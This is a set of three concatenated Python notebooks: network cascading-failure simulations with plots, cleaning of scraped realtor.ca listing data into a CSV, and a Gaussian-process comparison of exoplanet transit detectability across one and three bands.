    plt.scatter(T1_list, new_prm_list, color=colors[0], marker=markers[0], alpha=transparencies[0], s=30, edgecolors='none', label='$I=0.00$') # 0
    T2_list, new_prm_list = bin_data(T2_list, parameter_list, 3)
    plt.scatter(T2_list, new_prm_list, color=colors[0], marker=markers[0], alpha=transparencies[0], s=30, edgecolors='none')#, label='$I=0.00$') # 0
# Read in numerical results and plot
# Only I levels strictly below this threshold are accumulated/plotted.
I_thresh = 0.2
def extract(raw_string, start_marker, end_marker):
    """Return the substring of raw_string between start_marker and end_marker.

    The end marker is searched for only after the start marker's position.
    Raises ValueError when either marker is absent (str.index semantics).
    """
    begin = raw_string.index(start_marker) + len(start_marker)
    finish = raw_string.index(end_marker, begin)
    return raw_string[begin:finish]
# Accumulate numerically-computed switching times T1/T2 per interdependence
# value I, summed across realization directories (divided by len(dirs) later).
alpha_list = []
T1_dict = {}
T2_dict = {}
dirs = [x[0] for x in os.walk('./TOMLAB_data/alpha/')]
dirs = dirs[1:]  # drop the walk root itself; keep only subdirectories
for d_idx, d in enumerate(dirs):
    files = [f for f in os.listdir(d)]
    for f_idx, f in enumerate(files):
        if 'nonlin_alpha_' in f:
            # Extract alpha value (from the filename, between 'alpha_' and '.csv')
            alpha = float(extract(d+'/'+f, 'alpha_', '.csv'))
            alpha_list.append(alpha)
            # Read I, T1, T2 (rows 0, 1, 2 of the CSV)
            results_mat = np.genfromtxt(d+'/'+f, delimiter=',')
            I_vals = results_mat[0, :]
            T1_list = results_mat[1, :]
            T2_list = results_mat[2, :]
            for i, I in enumerate(I_vals):
                if I < I_thresh:
                    if str(I) not in T1_dict:
                        T1_dict[str(I)] = []
                        T2_dict[str(I)] = []
                    if d_idx == 0:
                        # First directory seeds the per-file lists
                        T1_dict[str(I)].append(T1_list[i])
                        T2_dict[str(I)].append(T2_list[i])
                    else:
                        # Subsequent directories accumulate element-wise.
                        # NOTE(review): indexing by f_idx assumes every
                        # directory lists files in the same order -- confirm.
                        T1_dict[str(I)][f_idx] += T1_list[i]
                        T2_dict[str(I)][f_idx] += T2_list[i]
# Plot the directory-averaged T1/T2 curves against alpha for selected I
# values, smoothed with a Savitzky-Golay filter, then finish the figure.
k = 0  # index into the (reversed) colors list, advanced per plotted I
for i, I in enumerate(I_vals[::-1]):
    norm = 1/len(dirs)  # convert accumulated sums into averages
    # NOTE(review): exact float membership test -- relies on I_vals holding
    # these exact binary representations; confirm against the data files.
    if I in [0., 0.05, 0.1, 0.15, 0.2]:
        if I < I_thresh:
            # Sort both curves by alpha so the line plots are monotone in y
            sorted_T1_lists = [list(x) for x in zip(*sorted(zip(alpha_list, T1_dict[str(I)]), key=lambda pair: pair[0]))]
            sorted_alpha_list = sorted_T1_lists[0]
            sorted_T1_list = sorted_T1_lists[1]
            sorted_T2_lists = [list(x) for x in zip(*sorted(zip(alpha_list, T2_dict[str(I)]), key=lambda pair: pair[0]))]
            sorted_T2_list = sorted_T2_lists[1]
            norm_T1 = norm*np.array(sorted_T1_list)
            norm_T2 = norm*np.array(sorted_T2_list)
            # Smoothen with SG filter (window length 11, polynomial order 2)
            norm_T1 = savgol_filter(norm_T1, 11, 2)
            norm_T2 = savgol_filter(norm_T2, 11, 2)
            # Color-dependent alpha so the black and navy curves stay legible
            if colors[::-1][k] == 'k':
                plt.plot(norm_T2, sorted_alpha_list, color=colors[::-1][k], alpha=0.65, linewidth=2.5)#, linestyle='--')
                plt.plot(norm_T1, sorted_alpha_list, color=colors[::-1][k], alpha=0.65, linewidth=2.5)#, linestyle='--')
            elif colors[::-1][k] == '#000080':
                plt.plot(norm_T2, sorted_alpha_list, color=colors[::-1][k], alpha=0.65, linewidth=2.5)
                plt.plot(norm_T1, sorted_alpha_list, color=colors[::-1][k], alpha=0.65, linewidth=2.5)
            else:
                plt.plot(norm_T2, sorted_alpha_list, color=colors[::-1][k], linewidth=2.5)#, linestyle='--')
                plt.plot(norm_T1, sorted_alpha_list, color=colors[::-1][k], linewidth=2.5)#, linestyle='--')
            # shading between the two switching-time branches for I = 0
            if I == 0:
                plt.fill_betweenx(sorted_alpha_list, norm_T1, norm_T2, color='#000080', alpha=0.05)
        k += 1
#plt.scatter(parameter_list/2.5, T_list_g, color='magenta') # 0.25
plt.xlabel('Switching Times, $t$', fontsize=14)
plt.ylabel('Cost of repair, '+r'$\alpha$', fontsize=14)
plt.tick_params(axis='both', which='major', labelsize=12)
plt.tick_params(axis='both', which='minor', labelsize=12)
plt.xlim(0, 100)
plt.ylim(1, 18)
#plt.legend(loc='upper right')
plt.legend(loc='lower center', fontsize=14, borderaxespad=0.5)
plt.tight_layout()
plt.savefig('Nonlinear_BA.png', dpi=800)
plt.show()
# -
# ## Figure S4c: Critical failure time $t_c$ as a function of $I$ for the three network structures
# +
######
# Ensemble simulation: critical failure time t_c vs interdependence I for a
# Gilbert random graph ('Grandom_s'); 200 realizations per I value.
alpha = 10
r = 0            # repair rate
f = 0.025        # damage rate
N = 100          # number of nodes
p = 0.1          # edge probability
graph_type = 'Grandom_s'
######
d = 0
f_thresh = 0.1   # vitality threshold at which a realization terminates
weight_type = 'uniform'
check_type = 'none'
kinetic = 1
P_check = 0.01
e = 0
cost_type = ['basic']
costC = 0
costR = 0
costE = 0
costD = 0
costL = 0  # FIX: was `costL=0,` -- the trailing comma made this the tuple (0,)
P_repl = 0
costrepl = 0
max_repl = 1
repl_type = 'constant'
node_type = 'binary'
damage_type = 'uniform'
edge_type = 'binary'
f_edge = 0
r_edge = 0
std = 0.3  # FIX: was `std=0.3,` -- trailing comma made it (0.3,); std is passed to Damage/Check_and_Repair
P_ablate = 0
costablate = 0
ablate_type = 'constant'
repair_start = 0
repair_end = 'none'
delay = 0  # FIX: was `delay=0,` -- trailing comma made it (0,)
time_end = 'none'
save = 'no'
plot = 'yes'
write_inds = 'no'
I_list = np.linspace(0.05, 1, 30)
t_c_list = []
sigma_t_list = []
for dependency in I_list:
    phi_c_I_list = []
    t_c_I_list = []
    for ind in range(200):  # independent realizations per interdependence value
        A, v = initIndividual(N, graph_type, p, d, edge_type)
        # Number of nodes each node is dependent on
        num_neigh = np.sum(A, axis=0)
        # Replication counter vector (unused in this configuration)
        repl_v = np.zeros(N)
        # Summary lists
        vitality = []
        h_fraction = []
        m_fraction = []
        i = 0
        while i >= 0:  # runs until the vitality threshold is crossed
            # Weight and degree vectors for the current network state
            degree_vec = getDegrees(A)
            weight_vec = getWeights(weight_type, A, v, degree_vec)
            vitality_i, interdependence_i = Analyze(v, f, r, i, weight_vec)
            vitality.append(vitality_i)
            # Break if vitality falls to/below the threshold (or all nodes dead)
            if np.sum(v)/len(v) <= f_thresh or np.sum(v) == 0:
                break
            # Stop data collection if time_end is reached
            if time_end != 'none' and i >= time_end:
                break
            # simulate stochastic damage
            A, v, f = Damage(A, v, f, damage_type, node_type, edge_type, f_edge, std, i)
            # Check and repair network (active only in [repair_start, repair_end])
            if i >= repair_start:
                if repair_end != 'none':
                    if i <= int(repair_end):
                        cost_cr, A, v, P_check, r = Check_and_Repair(A, v, r, check_type, kinetic, P_check, e, i, costC, costR,
                                                                     node_type, edge_type, r_edge, std)
                        cost_r = r
                    else:
                        cost_cr = 0
                        cost_r = 0
                else:
                    cost_cr, A, v, P_check, r = Check_and_Repair(A, v, r, check_type, kinetic, P_check, e, i, costC, costR,
                                                                 node_type, edge_type, r_edge, std)
                    cost_r = r
            else:
                cost_cr = 0
                cost_r = 0
            # dependency-related (cascading) failure
            if dependency > 0:
                v = dependencyFail(A, v, num_neigh, dependency, equilibrate_failures=True)
            i += 1
        # Critical index: first step at which vitality <= 0.1 (else last step)
        for idx in range(len(vitality)):
            if vitality[idx] <= 0.1:
                crit_idx = idx
                break
            elif idx == len(vitality)-1:
                crit_idx = idx
        # NOTE(review): the -4 offset is unexplained here; presumably aligns
        # t_c with a convention used elsewhere -- confirm.
        t_c_I_list.append(crit_idx-4)
    sigma_t_list.append(np.std(np.array(t_c_I_list)))
    t_c_list.append(np.average(np.array(t_c_I_list)))
np.savetxt('t_c_sigma_gil.csv', np.vstack((I_list, sigma_t_list)), delimiter=',')
np.savetxt('t_c_dist_gil.csv', np.vstack((I_list, t_c_list)), delimiter=',')
# +
######
# Ensemble simulation: critical failure time t_c vs interdependence I for an
# Erdos-Renyi random graph ('ERrandom_s'); 200 realizations per I value.
alpha = 10
r = 0            # repair rate
f = 0.025        # damage rate
N = 100          # number of nodes
p = 0.1          # edge probability
graph_type = 'ERrandom_s'
######
d = 0
f_thresh = 0.1   # vitality threshold at which a realization terminates
weight_type = 'uniform'
check_type = 'none'
kinetic = 1
P_check = 0.01
e = 0
cost_type = ['basic']
costC = 0
costR = 0
costE = 0
costD = 0
costL = 0  # FIX: was `costL=0,` -- the trailing comma made this the tuple (0,)
P_repl = 0
costrepl = 0
max_repl = 1
repl_type = 'constant'
node_type = 'binary'
damage_type = 'uniform'
edge_type = 'binary'
f_edge = 0
r_edge = 0
std = 0.3  # FIX: was `std=0.3,` -- trailing comma made it (0.3,); std is passed to Damage/Check_and_Repair
P_ablate = 0
costablate = 0
ablate_type = 'constant'
repair_start = 0
repair_end = 'none'
delay = 0  # FIX: was `delay=0,` -- trailing comma made it (0,)
time_end = 'none'
save = 'no'
plot = 'yes'
write_inds = 'no'
I_list = np.linspace(0.05, 1, 30)
t_c_list = []
sigma_t_list = []
for dependency in I_list:
    phi_c_I_list = []
    t_c_I_list = []
    for ind in range(200):  # independent realizations per interdependence value
        A, v = initIndividual(N, graph_type, p, d, edge_type)
        # Number of nodes each node is dependent on
        num_neigh = np.sum(A, axis=0)
        # Replication counter vector (unused in this configuration)
        repl_v = np.zeros(N)
        # Summary lists
        vitality = []
        h_fraction = []
        m_fraction = []
        i = 0
        while i >= 0:  # runs until the vitality threshold is crossed
            # Weight and degree vectors for the current network state
            degree_vec = getDegrees(A)
            weight_vec = getWeights(weight_type, A, v, degree_vec)
            vitality_i, interdependence_i = Analyze(v, f, r, i, weight_vec)
            vitality.append(vitality_i)
            # Break if vitality falls to/below the threshold (or all nodes dead)
            if np.sum(v)/len(v) <= f_thresh or np.sum(v) == 0:
                break
            # Stop data collection if time_end is reached
            if time_end != 'none' and i >= time_end:
                break
            # simulate stochastic damage
            A, v, f = Damage(A, v, f, damage_type, node_type, edge_type, f_edge, std, i)
            # Check and repair network (active only in [repair_start, repair_end])
            if i >= repair_start:
                if repair_end != 'none':
                    if i <= int(repair_end):
                        cost_cr, A, v, P_check, r = Check_and_Repair(A, v, r, check_type, kinetic, P_check, e, i, costC, costR,
                                                                     node_type, edge_type, r_edge, std)
                        cost_r = r
                    else:
                        cost_cr = 0
                        cost_r = 0
                else:
                    cost_cr, A, v, P_check, r = Check_and_Repair(A, v, r, check_type, kinetic, P_check, e, i, costC, costR,
                                                                 node_type, edge_type, r_edge, std)
                    cost_r = r
            else:
                cost_cr = 0
                cost_r = 0
            # dependency-related (cascading) failure
            if dependency > 0:
                v = dependencyFail(A, v, num_neigh, dependency, equilibrate_failures=True)
            i += 1
        # Critical index: first step at which vitality <= 0.1 (else last step)
        for idx in range(len(vitality)):
            if vitality[idx] <= 0.1:
                crit_idx = idx
                break
            elif idx == len(vitality)-1:
                crit_idx = idx
        # NOTE(review): the -4 offset is unexplained here; presumably aligns
        # t_c with a convention used elsewhere -- confirm.
        t_c_I_list.append(crit_idx-4)
    sigma_t_list.append(np.std(np.array(t_c_I_list)))
    t_c_list.append(np.average(np.array(t_c_I_list)))
np.savetxt('t_c_sigma_er.csv', np.vstack((I_list, sigma_t_list)), delimiter=',')
np.savetxt('t_c_dist_er.csv', np.vstack((I_list, t_c_list)), delimiter=',')
# +
######
# Ensemble simulation: critical failure time t_c vs interdependence I for a
# scale-free (Barabasi-Albert) graph ('scale_free_s'); 200 realizations per I.
alpha = 10
r = 0            # repair rate
f = 0.025        # damage rate
N = 100          # number of nodes
p = 0.1          # edge probability
graph_type = 'scale_free_s'
######
d = 0
f_thresh = 0.1   # vitality threshold at which a realization terminates
weight_type = 'uniform'
check_type = 'none'
kinetic = 1
P_check = 0.01
e = 0
cost_type = ['basic']
costC = 0
costR = 0
costE = 0
costD = 0
costL = 0  # FIX: was `costL=0,` -- the trailing comma made this the tuple (0,)
P_repl = 0
costrepl = 0
max_repl = 1
repl_type = 'constant'
node_type = 'binary'
damage_type = 'uniform'
edge_type = 'binary'
f_edge = 0
r_edge = 0
std = 0.3  # FIX: was `std=0.3,` -- trailing comma made it (0.3,); std is passed to Damage/Check_and_Repair
P_ablate = 0
costablate = 0
ablate_type = 'constant'
repair_start = 0
repair_end = 'none'
delay = 0  # FIX: was `delay=0,` -- trailing comma made it (0,)
time_end = 'none'
save = 'no'
plot = 'yes'
write_inds = 'no'
I_list = np.linspace(0.05, 1, 30)
t_c_list = []
sigma_t_list = []
for dependency in I_list:
    phi_c_I_list = []
    t_c_I_list = []
    for ind in range(200):  # independent realizations per interdependence value
        A, v = initIndividual(N, graph_type, p, d, edge_type)
        # Number of nodes each node is dependent on
        num_neigh = np.sum(A, axis=0)
        # Replication counter vector (unused in this configuration)
        repl_v = np.zeros(N)
        # Summary lists
        vitality = []
        h_fraction = []
        m_fraction = []
        i = 0
        while i >= 0:  # runs until the vitality threshold is crossed
            # Weight and degree vectors for the current network state
            degree_vec = getDegrees(A)
            weight_vec = getWeights(weight_type, A, v, degree_vec)
            vitality_i, interdependence_i = Analyze(v, f, r, i, weight_vec)
            vitality.append(vitality_i)
            # Break if vitality falls to/below the threshold (or all nodes dead)
            if np.sum(v)/len(v) <= f_thresh or np.sum(v) == 0:
                break
            # Stop data collection if time_end is reached
            if time_end != 'none' and i >= time_end:
                break
            # simulate stochastic damage
            A, v, f = Damage(A, v, f, damage_type, node_type, edge_type, f_edge, std, i)
            # Check and repair network (active only in [repair_start, repair_end])
            if i >= repair_start:
                if repair_end != 'none':
                    if i <= int(repair_end):
                        cost_cr, A, v, P_check, r = Check_and_Repair(A, v, r, check_type, kinetic, P_check, e, i, costC, costR,
                                                                     node_type, edge_type, r_edge, std)
                        cost_r = r
                    else:
                        cost_cr = 0
                        cost_r = 0
                else:
                    cost_cr, A, v, P_check, r = Check_and_Repair(A, v, r, check_type, kinetic, P_check, e, i, costC, costR,
                                                                 node_type, edge_type, r_edge, std)
                    cost_r = r
            else:
                cost_cr = 0
                cost_r = 0
            # dependency-related (cascading) failure
            if dependency > 0:
                v = dependencyFail(A, v, num_neigh, dependency, equilibrate_failures=True)
            i += 1
        # Critical index: first step at which vitality <= 0.1 (else last step)
        for idx in range(len(vitality)):
            if vitality[idx] <= 0.1:
                crit_idx = idx
                break
            elif idx == len(vitality)-1:
                crit_idx = idx
        # NOTE(review): the -4 offset is unexplained here; presumably aligns
        # t_c with a convention used elsewhere -- confirm.
        t_c_I_list.append(crit_idx-4)
    sigma_t_list.append(np.std(np.array(t_c_I_list)))
    t_c_list.append(np.average(np.array(t_c_I_list)))
np.savetxt('t_c_sigma_ba.csv', np.vstack((I_list, sigma_t_list)), delimiter=',')
np.savetxt('t_c_dist_ba.csv', np.vstack((I_list, t_c_list)), delimiter=',')
# +
# Load the saved t_c means and standard deviations for the three graph
# ensembles and plot t_c(I) with one-sigma shaded bands.
gil = np.genfromtxt('t_c_sigma_gil.csv', delimiter=',')
gil2 = np.genfromtxt('t_c_dist_gil.csv', delimiter=',')
sig_gil = gil[1,:]   # row 0 is I_list, row 1 is the statistic
t_c_gil = gil2[1,:]
er = np.genfromtxt('t_c_sigma_er.csv', delimiter=',')
er2 = np.genfromtxt('t_c_dist_er.csv', delimiter=',')
t_c_er = er2[1,:]
sig_er = er[1,:]
ba = np.genfromtxt('t_c_sigma_ba.csv', delimiter=',')
ba2 = np.genfromtxt('t_c_dist_ba.csv', delimiter=',')
t_c_ba = ba2[1,:]
sig_ba = ba[1,:]
I_list = gil[0,:]
plt.figure(figsize=(10,4))
plt.scatter(I_list,t_c_gil, color='#000080', alpha=0.5, s=30, edgecolors='none',label='Gilbert')
plt.scatter(I_list,t_c_er, color='k', marker='^', alpha=0.3, s=30, edgecolors='none',label='Erdos-Renyi')
plt.scatter(I_list,t_c_ba, color='g', marker='s', alpha=0.6, s=30, edgecolors='none',label='Barabasi-Albert')
plt.plot(I_list,t_c_gil, color='#000080', alpha=0.7, linestyle='--')
plt.plot(I_list,t_c_er, color='k', alpha=0.7, linestyle='--')
plt.plot(I_list,t_c_ba, color='g', alpha=0.7, linestyle='--')
# One-sigma shaded bands around each mean curve
plt.fill_between(I_list, t_c_gil-sig_gil, t_c_gil+sig_gil,facecolor='#000080',alpha=0.02)
plt.fill_between(I_list, t_c_er-sig_er, t_c_er+sig_er,facecolor='k',alpha=0.02)
plt.fill_between(I_list, t_c_ba-sig_ba, t_c_ba+sig_ba,facecolor='g',alpha=0.04)
#plt.plot(I_list_anly,t_c_anly, 'k', alpha=0.5, label='Theoretical',linewidth=3.0,linestyle='--')
plt.xlabel('Interdependence, $I$', fontsize=15)
plt.ylabel('Critical time, $t_c$', fontsize=15)
plt.xticks(fontsize=12)
plt.yticks(fontsize=12)
plt.legend(loc='best',fontsize=15)
plt.xlim(0.05,0.9)
plt.ylim(0,80)
plt.tight_layout()
plt.savefig('t_c_dist.png',dpi=800,bbox_inches='tight')
plt.show()
# -
|
network_topology.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Cleaning data borrowed from a real-estate listing website
import pandas as pd
# +
# Input data directory and the Django-style app media root the cleaned CSV
# is exported to.
DATA_PATH = "data/"
PATH_TO_APP_MEDIA_ROOT = "../app/media/"
# Raise pandas' display limits so wide/long frames render fully in the notebook.
display_max_output = True
if display_max_output:
    pd.options.display.max_rows = 999
    pd.options.display.max_columns = 999
# +
# This data is from a Canadian real estate listing website: realtor.ca
# I'm using this data for private and non-commercial use
# as per realtor.ca's Terms of Use Agreement: https://www.realtor.ca/terms-of-use
# To reproduce:
# Copy the network request to https://api2.realtor.ca/Listing.svc/PropertySearch_Post
# Update the `RecordsPerPage` value to be whatever you want.
# Note that this is not an official API.
# One JSON record per line, saved from the (unofficial) realtor.ca
# PropertySearch_Post endpoint -- see the cell comment above.
realtor_api_response = pd.read_json(f"{DATA_PATH}realtor_ca_data.json", lines=True)
realtor_api_response
# -
# Each response row holds a list of listings; explode to one listing per row,
# then flatten the nested JSON into dotted column names.
results = realtor_api_response["Results"].explode("Results")
properties = pd.json_normalize(results)
properties
properties.columns
# ## Separate out Address Text
# Before: '100 Regina St. S. Unit# 100|Waterloo, Ontario N2J4P9'
# After: ['100 Regina St. S.', '100', 'Waterloo', 'Ontario', 'N2J4P9', 'Canada']
# +
# Separate out street address
# AddressText format: 'street [Unit# n]|City, Province PostalCode'
split_address_text = (
    properties["Property.Address.AddressText"]
    .str.split("|")
)
properties["Property.Address.StreetAddress"] = (
    split_address_text
    .apply(lambda x: x[0].strip())
)
# +
# Separate out city
# Second half of the '|' split is 'City, Province PostalCode'
split_city_province = (
    split_address_text.apply(lambda x: x[1])
    .str.split(",")
)
properties["Property.Address.City"] = (
    split_city_province.apply(lambda x: x[0].strip())
)
# +
# Separate out province
# Remainder after the ',' split is 'Province PostalCode'; take the first token
split_province_postal_code = (
    split_city_province.apply(lambda x: x[1].strip())
    .str.split(" ")
)
properties["Property.Address.Province"] = (
    split_province_postal_code.apply(lambda x: x[0].strip())
)
# +
# Separate out unit number for street addresses with "Unit#"
# Default: empty string for listings with no unit number.
properties["Property.Address.UnitNumber"] = ""
props_w_unit_num_mask = properties["Property.Address.StreetAddress"].str.contains(" Unit# ")
split_addresses = (
    properties[props_w_unit_num_mask]["Property.Address.StreetAddress"]
    .str.split(" Unit# ")
)
properties.loc[
    props_w_unit_num_mask,
    ["Property.Address.UnitNumber"],
] = split_addresses.apply(lambda x: x[1].strip())
properties.loc[
    props_w_unit_num_mask,
    ["Property.Address.StreetAddress"],
] = split_addresses.apply(lambda x: x[0].strip())
# +
# Separate out unit number for street addresses with "#__ -street_address"
props_w_unit_num_mask = properties["Property.Address.StreetAddress"].str[0] == "#"
split_addresses = (
    properties[props_w_unit_num_mask]["Property.Address.StreetAddress"]
    .str.split(" -")
)
properties.loc[
    props_w_unit_num_mask,
    ["Property.Address.UnitNumber"],
] = split_addresses.apply(lambda x: x[0][1:].strip())  # drop the leading '#'
properties.loc[
    props_w_unit_num_mask,
    ["Property.Address.StreetAddress"],
] = split_addresses.apply(lambda x: x[1].strip())
# -
# Clean up street address strings: collapse runs of spaces and title-case.
# FIX: pass regex=True explicitly -- pandas 2.0 changed str.replace's default
# to regex=False, under which the pattern " +" would be matched literally.
properties["Property.Address.StreetAddress"] = (
    properties["Property.Address.StreetAddress"]
    .str.replace(r" +", " ", regex=True)
    .str.title()
)
# Add Canada as country. Hard-coded because realtor.ca only operates in Canada.
properties["Property.Address.Country"] = "Canada"
properties.head()
# ## Clean up other columns
# Get the first photo in high res. It's all we need for now.
# FIX: the previous guard `isinstance(x, list) and x[0]` evaluated x[0]
# before any emptiness check, raising IndexError on an empty list; `and x`
# now short-circuits first. Non-list values (e.g. NaN) still yield "".
properties["Property.PhotoLink"] = (
    properties["Property.Photo"]
    .apply(
        lambda x: x[0]["HighResPath"]
        if isinstance(x, list) and x and x[0]
        else ""
    )
)
# Pre-pend realtor website to RelativeDetailsURL
properties["DetailsURL"] = (
    "https://realtor.ca" + properties["RelativeDetailsURL"]
)
# First parking entry's name, or "" when parking info is absent/empty.
properties["Property.ParkingType"] = (
    properties["Property.Parking"]
    .apply(
        lambda x: x[0]["Name"]
        if isinstance(x, list) and x and x[0]
        else ""
    )
)
# Date the listing data was scraped.
properties["DateAccessed"] = pd.to_datetime("2021-05-12")
# ## Export data
# +
# Columns exported for the downstream app; the commented-out names below were
# considered and deliberately excluded.
cols_of_interest = [
    "Property.Address.StreetAddress", "Property.Address.UnitNumber",
    "Property.Address.City", "Property.Address.Province", "PostalCode",
    "Property.Address.Country",
    "Property.Address.Latitude", "Property.Address.Longitude",
    "MlsNumber", "DateAccessed", "Property.PriceUnformattedValue",
    "DetailsURL", "Building.SizeInterior",
    "Building.Bedrooms", "Building.BathroomTotal",
    "Building.StoriesTotal", "Building.UnitTotal",
    "Land.SizeTotal", "Land.SizeFrontage",
    "Property.PhotoLink",
    "Property.Type", "Building.Type",
    "Property.OwnershipType",
    "Property.ParkingType", "Property.ParkingSpaceTotal",
    "PublicRemarks",
    # "Id", "Individual", "RelativeDetailsURL",
    # "StatusId", "PhotoChangeDateUTC", "HasNewImageUpdate", "Distance",
    # "RelativeURLEn", "RelativeURLFr",
    # "Building.Ammenities", "Property.Price",
    # "Property.Address.PermitShowAddress", "Property.Address.DisseminationArea",
    # "Property.Photo", "Property.TypeId",
    # "Property.AmmenitiesNearBy", "Property.ConvertedPrice",
    # "Property.OwnershipTypeGroupIds", "Property.ParkingType",
    # "Land.AccessType", "AlternateURL.VideoLink",
    # "AlternateURL.PhotoLink", "AlternateURL.BrochureLink",
    # "Property.Address.AddressText", "Land.LandscapeFeatures",
    # "AlternateURL.MapLink", "Building.SizeExterior",
    # "AlternateURL.DetailsLink", "AlternateURL.SoundLink"
]
properties[cols_of_interest]
# -
# Write the cleaned data both to the local data dir and to the app's media root.
properties[cols_of_interest].to_csv(f"{DATA_PATH}realtor_ca_cleaned_data.csv", index=False)
properties[cols_of_interest].to_csv(
    f"{PATH_TO_APP_MEDIA_ROOT}realtor_ca_cleaned_data.csv",
    index=False,
)
|
notebooks/clean_realtor_ca_data.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import numpy as np
import matplotlib.pyplot as pl
# %matplotlib inline
import theano.tensor as tt
import pymc3 as pm
import exoplanet as xo
import specgp as sgp
# Shared qualitative palette used by all figures in this notebook.
red, blue = '#FE4365', '#00A9FF'
yellow, green = '#ECA25C', '#3F9778'
darkblue = '#005D7F'
# Plot-order palette: warm, green, cool, accent, dark.
colors = [red, green, blue, yellow, darkblue]
# +
# Load the three-band posterior (trace3) and summarize each parameter by its
# posterior mean and standard deviation.
with pm.Model() as model:
    trace = pm.load_trace('traces/trace3')
mu, sig = {}, {}
for k, v in trace[0].items():
    vals = trace.get_values(k)
    mu[k] = np.mean(vals, axis=0)
    sig[k] = np.std(vals, axis=0)
# White-noise level: 20 ppm in each of the three bands (ppt after *1e-3).
ppm = np.array([20, 20, 20])
mu['logsig'] = np.log(ppm * 1e-3)
# +
# Build the three-band GP: two SHO kernel terms (term1 with Q fixed to
# 1/sqrt(2), term2 with fitted Q), each scaled across bands via a KronTerm.
term1 = xo.gp.terms.SHOTerm(log_S0=mu["logS0"][0],
                            log_w0=mu["logw"][0],
                            log_Q=-np.log(np.sqrt(2))
                            )
term2 = xo.gp.terms.SHOTerm(log_S0=mu["logS0"][1],
                            log_w0=mu["logw"][1],
                            log_Q=mu["logQ"]
                            )
# Per-band amplitude scalings; the first band is fixed to exp(0) = 1.
alpha1 = np.exp([0, mu["alpha1"][0], mu["alpha2"][0]])
alpha2 = np.exp([0, mu["alpha1"][1], mu["alpha2"][1]])
kernel = (sgp.terms.KronTerm(term1, alpha=alpha1) +
          sgp.terms.KronTerm(term2, alpha=alpha2))
t = np.linspace(-1, 1, 1000)
logsig = np.array(mu["logsig"])
# Per-band white-noise variance replicated along the time axis: shape (3, len(t))
diag = np.exp(2*logsig)[:, None] * np.ones((3, len(t)))
mean = mu["mean"][:, None] * np.ones_like(t)
gp3 = xo.gp.GP(x=t, kernel=kernel, diag=diag, mean=sgp.means.KronMean(mean), J=4)
# +
import bic
# Delta-BIC vs radius ratio for the three-band model.
r_ratio = np.linspace(0.001, 0.01, 30)
with pm.Model() as model:
    delta_bic3 = np.zeros(30)
    for i, r in enumerate(r_ratio):
        orbit = xo.orbits.KeplerianOrbit(period=5.0)
        # Transit light curve scaled by 1e3 (to ppt), then replicated into
        # all three bands via the ones(3) broadcast below.
        mean = (xo.LimbDarkLightCurve([0.2, 0.3])
                .get_light_curve(orbit=orbit, r=r, t=t, texp=0.02)*1e3).T[0]
        mean = tt.ones(3)[:, None] * mean
        delta_bic3[i] = xo.eval_in_model(bic.delta_bic(gp3, mean, 4, t), mu)
# +
# Load the single-band posterior (trace1) and summarize as above.
with pm.Model() as model:
    trace = pm.load_trace('traces/trace1')
mu, sig = {}, {}
for k, v in trace[0].items():
    vals = trace.get_values(k)
    mu[k] = np.mean(vals, axis=0)
    sig[k] = np.std(vals, axis=0)
# Single-band noise level: log-sigma of the mean of the three per-band variances.
mu['logsig'] = np.log(np.sum((ppm * 1e-3) ** 2) / 3) / 2
# +
# Single-band GP: same two SHO terms, but a plain (non-Kronecker) kernel sum
# with scalar mean and a 1-D white-noise diagonal.
term1 = xo.gp.terms.SHOTerm(log_S0=mu["logS0"][0],
                            log_w0=mu["logw"][0],
                            log_Q=-np.log(np.sqrt(2))
                            )
term2 = xo.gp.terms.SHOTerm(log_S0=mu["logS0"][1],
                            log_w0=mu["logw"][1],
                            log_Q=mu["logQ"]
                            )
kernel = term1 + term2
t = np.linspace(-1, 1, 1000)
logsig = mu["logsig"] * tt.ones(len(t))
diag = np.exp(2*logsig)
mean = mu["mean"]
gp1 = xo.gp.GP(x=t, kernel=kernel, diag=diag, mean=mean, J=4)
# +
import bic
# Delta-BIC vs radius ratio for the single-band model.
r_ratio = np.linspace(0.001, 0.01, 30)
with pm.Model() as model:
    delta_bic1 = np.zeros(30)
    for i, r in enumerate(r_ratio):
        orbit = xo.orbits.KeplerianOrbit(period=5.0)
        mean = (xo.LimbDarkLightCurve([0.2, 0.3])
                .get_light_curve(orbit=orbit, r=r, t=t, texp=0.02)*1e3).T[0]
        x = tt.as_tensor_variable(t)
        delta_bic1[i] = xo.eval_in_model(bic.delta_bic(gp1, mean, 4, x), mu)
# +
# Compare one-band vs three-band Delta-BIC curves; vertical lines mark the
# radius ratios of solar-system bodies, labeled via figure-fraction annotations.
pl.figure(figsize=(10, 8))
pl.plot(r_ratio, delta_bic1, color=colors[0], linewidth=3, label="one band")
pl.plot(r_ratio, delta_bic3, color=colors[2], linewidth=3, label="three bands")
# Grey band: region where Delta-BIC is inconclusive
pl.axhspan(-30, 10, color='k', alpha=0.3)
pl.ylim(-30, 150)
pl.xlabel(r"radius ratio $R_p/R_*$", fontsize=15)
pl.ylabel(r"$\Delta\ \mathrm{BIC}$", fontsize=15)
pl.axvline(0.00915, color='k')
pl.axvline(0.0048, color='k')
pl.axvline(0.0035, color='k')
pl.axvline(0.0025, color='k')
annotation_kwargs = {
    "xycoords": 'figure fraction',
    "rotation": 90,
    "fontsize": 15
}
pl.annotate("Moon", xy=(0.23, 0.5), **annotation_kwargs)
pl.annotate("Mercury", xy=(0.32, 0.5), **annotation_kwargs)
pl.annotate("Mars", xy=(0.44, 0.5), **annotation_kwargs)
pl.annotate("Earth", xy=(0.84, 0.5), **annotation_kwargs)
pl.legend(fontsize=15)
pl.title("Transit detection with solar\n noise observed by SOHO\n", fontsize=20)
# -
# Draw one sample from the three-band GP and overlay the transit model,
# offsetting the bands by -0.5 / 0 / +0.5 for display.
y = gp3.dot_l(np.random.randn(3*len(t), 1)).eval()
orbit = xo.orbits.KeplerianOrbit(period=5.0)
mean = (xo.LimbDarkLightCurve([0.2, 0.3])
        .get_light_curve(orbit=orbit, r=0.004, t=t, texp=0.02)*1e3).eval()
# The sample interleaves the three bands, so stride-3 slices pick each band out.
pl.plot(t, y[::3]+mean-0.5, '.')
pl.plot(t, y[1::3]+mean, '.')
